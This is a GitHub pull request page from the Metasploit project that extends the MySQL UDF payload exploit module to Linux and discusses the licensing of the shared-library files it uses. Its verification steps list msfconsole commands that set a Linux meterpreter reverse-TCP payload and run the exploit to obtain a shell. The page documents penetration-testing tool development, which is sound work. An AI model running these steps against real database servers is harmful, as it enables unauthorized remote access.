Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

mysql UDF now with more linux #9170

Merged
merged 3 commits into from Dec 22, 2017
Merged

mysql UDF now with more linux #9170

merged 3 commits into from Dec 22, 2017

Conversation

h00die
Copy link
Contributor

@h00die h00die commented Nov 3, 2017

This PR changes the mysql_payload module to work against linux targets as well. Please note all the changes required on target to make the system exploitable.

Verification

To create a vulnerable linux environment, see markdown docs

  • Start msfconsole
  • use exploit/multi/mysql/mysql_udf_payload
  • set payload linux/x86/meterpreter/reverse_tcp
  • set lhost [ip]
  • set rhost [ip]
  • set srvhost [ip]
  • set srvport [port]
  • set password [password]
  • set target 1
  • exploit
  • get a shell

@h00die
Copy link
Contributor Author

h00die commented Nov 3, 2017

@bcook-r7 The .so files came from golisermo, installed to /usr/share/golismero/tools/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so on Kali. Someone (lawyer-ish) may need to review their license to see if this could be added directly, or someone smart needs to create our own .so file. I'm not qualified to license review or make .so files. Just wanted it on the record and a heads up.

@0x27
Copy link

0x27 commented Nov 3, 2017

The actual source repo for the UDF objects is here: https://github.com/sqlmapproject/udfhack, its licenced using LGPL.

@acammack-r7 acammack-r7 added blocked Blocked by one or more additional tasks enhancement payload licensing labels Nov 3, 2017
@h00die
Copy link
Contributor Author

h00die commented Nov 3, 2017

I didn't look into what the exact difference was, however this is the reason i specifically said golismero and showed the path vs saying it was from sqlmap

root@k:/# md5sum /usr/share/golismero/tools/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so 
ab27f6c7634e9efc13fb2db29216a0a8  /usr/share/golismero/tools/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so
root@k:/# md5sum /usr/share/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_ 
1501fa7150239b18acc0f4a9db2ebc0d  /usr/share/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_

@h00die h00die removed the blocked Blocked by one or more additional tasks label Nov 4, 2017
@acammack-r7 acammack-r7 assigned acammack-r7 and wvu and unassigned acammack-r7 Nov 8, 2017
@wvu
Copy link
Contributor

wvu commented Nov 8, 2017

We need to get legal to look at this. Something like that.

@h00die
Copy link
Contributor Author

h00die commented Nov 9, 2017

no prob, i think that would be for the best.
If there is an issue, but the license on the sqlmap one is more favorable, I can attempt to look at the source to figure out what the difference is.

@busterb
Copy link
Member

busterb commented Nov 21, 2017
edited

We already have LGPL code in the tree (metasm) and GPL exploit code. This is fine. It does need a source link or copy in the tree so we meet distribution guidelines for GPL.

@h00die
Copy link
Contributor Author

h00die commented Dec 11, 2017

any time to get some lovin on this one?

@wvu
Copy link
Contributor

wvu commented Dec 11, 2017

I don't think we've got any movement on this one yet.

@busterb
Copy link
Member

busterb commented Dec 22, 2017

It's totally fine to move forward, no blockers.

@wvu wvu merged commit c9e3b88 into rapid7:master Dec 22, 2017
wvu added a commit that referenced this pull request Dec 22, 2017
@wvu
Land #9170, Linux UDF for mysql_udf_payload
caae33b
@wvu
Copy link
Contributor

wvu commented Dec 22, 2017
edited

Release Notes

The exploit/windows/mysql/mysql_payload module has been renamed exploit/multi/mysql/mysql_udf_payload and now supports Linux systems.

@busterb
Copy link
Member

busterb commented Dec 22, 2017

Thanks guys! 💪

@wvu
Copy link
Contributor

wvu commented Dec 22, 2017

dc2b5df

@h00die h00die deleted the linux_mysql_payload branch December 23, 2017 13:40
@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Jan 10, 2018
@h00die h00die mentioned this pull request Oct 25, 2018
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wvu wvu

Labels
enhancement licensing payload rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
6 participants
@h00die @0x27 @wvu @busterb @tdoan-r7 @acammack-r7